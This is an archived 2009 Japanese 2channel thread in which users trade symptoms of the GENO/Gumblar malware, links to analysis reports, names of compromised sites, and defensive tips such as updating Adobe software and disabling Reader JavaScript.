09/05/16 03:57:51
【管理も】同人サイト・GENOウィルス注意【閲覧も】
スレリンク(doujin板)
115 GENO sage New! 2009/05/16(土) 00:10:05 ID:GcV0AjPS0
てかセキュリティ板の連中も大したことないなぁ。
ニュー速レベルじゃんw
944:名無しさん@お腹いっぱい。
09/05/16 03:58:21
絶対まではいかないにしても2つともあるやつよりないやつのほうが感染しにくいって事でおk?
Adobe Flash Player
Adobe Acrobat Reade
945:名無しさん@お腹いっぱい。
09/05/16 03:58:35
vistavistaうぜえ
ID=xxでvistaもおkなウイルスでねーかな
946:名無しさん@お腹いっぱい。
09/05/16 03:59:14
>>941
俺のレスが引用されてるw
947:名無しさん@お腹いっぱい。
09/05/16 03:59:29
予防接種と同様にお考え下さい
948:名無しさん@お腹いっぱい。
09/05/16 03:59:47
>>930>>933
無いとは思ったけど誰かに否定して欲しかった
どうもありがとう
949:名無しさん@お腹いっぱい。
09/05/16 04:00:03
どっちのスレも見てるからちょっと楽しい
950:名無しさん@お腹いっぱい。
09/05/16 04:00:19
ニフティーの奴って感染してたの一人だけ?
951:名無しさん@お腹いっぱい。
09/05/16 04:01:05
【管理も】同人サイト・GENOウィルス注意【閲覧も】
スレリンク(doujin板)
のりこめー^^
952:名無しさん@お腹いっぱい。
09/05/16 04:01:10
>>932
サブマシーンで使うからOK
感染したら即再セットアップ
メインはパスワード入力しまくりだからかなり怖い
953:名無しさん@お腹いっぱい。
09/05/16 04:01:34
テンプレ整備して次スレの頃合じゃね
954:名無しさん@お腹いっぱい。
09/05/16 04:02:11
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
URLリンク(anubis.iseclab.org)
★GENOウイルスまとめ
URLリンク(www29.atwiki.jp)
★このサイトは諸事情により内容を書き換え
URLリンク(www3.atword.jp)
955:名無しさん@お腹いっぱい。
09/05/16 04:03:02
諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例
1.Adobe Readerを起動し「編集」メニューの「環境設定」
「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
OKを押して設定確定後、Adobe Readerを終了。
↓
2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
設定は SpeedUp - Fast がおすすめ。
注意すべきは
Acroform(拡張子なし)
Annotations(拡張子なし)
これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
そうしないと Adobe Reader が起動しなかったりする。
このとき追加作業として
EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
より安心かもしれない。
以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。
956:名無しさん@お腹いっぱい。
09/05/16 04:03:05
>>950
個人サイトがいくつかやられてる模様
これはニフティーどうこうって問題じゃないよ
他のドメインでも個人サイトで感染してるところはあるわけだし
個人どころか商用でも感染してるわけだけど
957:名無しさん@お腹いっぱい。
09/05/16 04:03:50
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
感染予防対策
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック
随時追加
958:名無しさん@お腹いっぱい。
09/05/16 04:03:53
関連スレに
【管理も】同人サイト・GENOウィルス注意【閲覧も】
スレリンク(doujin板)
貼っておくといいかも
あっち初心者でもわかるように説明してるし
959:名無しさん@お腹いっぱい。
09/05/16 04:04:21
以下攻撃されたサイト
小林製薬
URLリンク(www.kobayashi.co.jp)
国内の正規サイト改ざん:攻撃サイトを変え再襲来
URLリンク(www.so-net.ne.jp)
★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】
960:名無しさん@お腹いっぱい。
09/05/16 04:05:22
>>954
>>955
>>957
>>959
に>>958こんな感じでいいかな?
961:357
09/05/16 04:05:59
クリーンインストール後は
>>8-9
もしくは、ReaderもFlashも完全にアンインストール。
さらに、Firefox3.0.10をデフォルトブラウザにして
(やり方が分からなきゃ、アンインストールしてインストールしなおせば、デフォルトブラウザにするか?とたずねられるからYES)
専ブラから開くブラウザもFirefoxへ変更。
Firefoxのツール>アドオン>プラグインでadobeAcrobatやらFlash含め全部オフ
962:名無しさん@お腹いっぱい。
09/05/16 04:07:15
>>956
>ニフティーどうこうって
それはわかってるんだけど
ニフティーのドメインで何度かトロイの警告でてたからどうなのかと思っただけさ
963:名無しさん@お腹いっぱい。
09/05/16 04:07:31
>>961
参考になりました!
964:名無しさん@お腹いっぱい。
09/05/16 04:08:07
もうやだよ
こんな思いをなんでするのさ
965:名無しさん@お腹いっぱい。
09/05/16 04:09:00
>>945
出なくていいよ、カス
966:名無しさん@お腹いっぱい。
09/05/16 04:09:28
>>962
警告出たならそのとおりなんでしょう
967:名無しさん@お腹いっぱい。
09/05/16 04:10:20
管理人とか感染気付いてない場合ってあるのだろうか
968:名無しさん@お腹いっぱい。
09/05/16 04:10:31
>>931
そう
難読化されたコードはほぼ別々
難読化前のコードはどれも同じだけど
969:名無しさん@お腹いっぱい。
09/05/16 04:10:42
>>967
そりゃあるだろ
970:名無しさん@お腹いっぱい。
09/05/16 04:12:08
テレビで早く報道されたほうがいい
大多数の人たちはこの怖さ理解できていない
971:名無しさん@お腹いっぱい。
09/05/16 04:12:28
Firefoxの大勝利
972:名無しさん@お腹いっぱい。
09/05/16 04:12:41
>>967
確実にそっちのほうが多いだろ
973:名無しさん@お腹いっぱい。
09/05/16 04:13:07
真の勝利者はVista
974:名無しさん@お腹いっぱい。
09/05/16 04:13:09
確かにパソコンが画期的に使いづらくはなるが個人情報が抜かれるみたいな
破滅的なことはないから報道はされないと思われる
975:名無しさん@お腹いっぱい。
09/05/16 04:13:48
>>960
ぶっちゃけ初心者はスキャン結果の見方すらわかんないだろうし
何をどう説明したって無駄な気もするんだが
それでも何も手を差し伸べないわけにもいかんし
時々イラッと来ることもあるが
そこら辺は仕方ないと諦めて
テンプレはそんなもんでいんじゃね?
あと個人的願望↓
痛いニュース辺りで取り上げてくれれば情報は一気に広まると思うんだけどなあ
976:357
09/05/16 04:13:59
>>475
もテンプレ頼むわ。
sqlsodbc.chmを改変のハッシュ値も張った方がいい。
俺は忘れちまった。
既にブロックするブラックリストにGumblar.cnを登録しちまったから、検索できない。
誰か頼む。
あと、プリフェチを使わない方法も。
ああ、1000までに書ききれない。
977:名無しさん@お腹いっぱい。
09/05/16 04:14:18
痛いニュース、頼んだぞ
978:名無しさん@お腹いっぱい。
09/05/16 04:14:57
>>974
抜かれるぞ よゆうで
お金も抜かれるかもな
979:名無しさん@お腹いっぱい。
09/05/16 04:15:22
Adobe Flash PlayerとAdobe Readerの違いがわからないんだけど
すべてのプログラムにAdobe Readerしか無かったってことはAdobe Flash Playerインストールしてないのかな
どこにあるかどうやって探すんですか?
980:名無しさん@お腹いっぱい。
09/05/16 04:15:41
キャプチャもとりほうだい
なんでもできる危険なウイルスだぞ
981:名無しさん@お腹いっぱい。
09/05/16 04:15:58
よし、いつもネットばっかしてて描けないしこういう時こそ絵を描こう
982:名無しさん@お腹いっぱい。
09/05/16 04:16:32
>>968
ありがとうございます
相手の管理人に連絡とってみます
983:名無しさん@お腹いっぱい。
09/05/16 04:16:45
週末恒例俺のエロサイト巡りの時間を返せ!
984:名無しさん@お腹いっぱい。
09/05/16 04:16:47
firefoxのアドオンで停止すべきなのはreaderとshockwaveflashでおk?
985:名無しさん@お腹いっぱい。
09/05/16 04:16:55
あらゆるパスワード抜けるし大概のことはできるぜひゃっほーー!!
こわすぎる
986:名無しさん@お腹いっぱい。
09/05/16 04:17:15
では、立ててくる。
補完宜しくです。
987:名無しさん@お腹いっぱい。
09/05/16 04:17:18
地雷がどこに埋まっているか分からない状態でネットサーフィンか・・・怖いね。
このウィルスに関してはアンチウィルスソフトもあてにならないし・・・。
(((( ;゚Д゚)))ガクガクブルブル
普段行かないサイトには関わらないほうがいいね。
普段行ってるサイトでもセキュリティーが駄目そうなところには行かないほうが良さそう・・・。
(((( ;゚Д゚)))ガクガクブルブル
988:名無しさん@お腹いっぱい。
09/05/16 04:17:45
>>978>>980
超危険なのね
早く警察か公務員が感染しないかなぁ
そうすれば、公になる
989:名無しさん@お腹いっぱい。
09/05/16 04:17:47
>>979
フラッシュゲームが出来なければ無い
990:名無しさん@お腹いっぱい。
09/05/16 04:17:52
web制作会社も感染してるらしいので
これから公式サイトとかもがんがん感染しだすんじゃねーの
991:名無しさん@お腹いっぱい。
09/05/16 04:18:43
豚インフルエンザどころの騒ぎじゃねえな・・・。
992:名無しさん@お腹いっぱい。
09/05/16 04:19:28
股が臭い16の夜
993:名無しさん@お腹いっぱい。
09/05/16 04:19:31
>>990
どういう意味
994:名無しさん@お腹いっぱい。
09/05/16 04:19:36
誰かが宣言無しで立ててた
995:名無しさん@お腹いっぱい。
09/05/16 04:19:59
せんせーい
2つもすれたってまーす
996:名無しさん@お腹いっぱい。
09/05/16 04:20:10
重複w
997:357
09/05/16 04:20:22
>>984
そうだけど、Javaもしょちゅう狙われるから切った方がいい。
最新は13ね。
というか、せめて沈静化するまでは、全部切るのが一番いいんだが・・・。
998:名無しさん@お腹いっぱい。
09/05/16 04:20:23
重複してんじゃん
999:名無しさん@お腹いっぱい。
09/05/16 04:20:45
てか向こうジャンル晒しなんか心底どうでもいいからドメイン晒してほしいナー
1000:名無しさん@お腹いっぱい。
09/05/16 04:21:03
>>989
フラッシュゲームやったことないです
avastが有効ってレスもあるのでAdobe Flash Playerと一緒にインストールしたいんですが
その二つはググっても大丈夫ですかね。。
1001:1001
Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。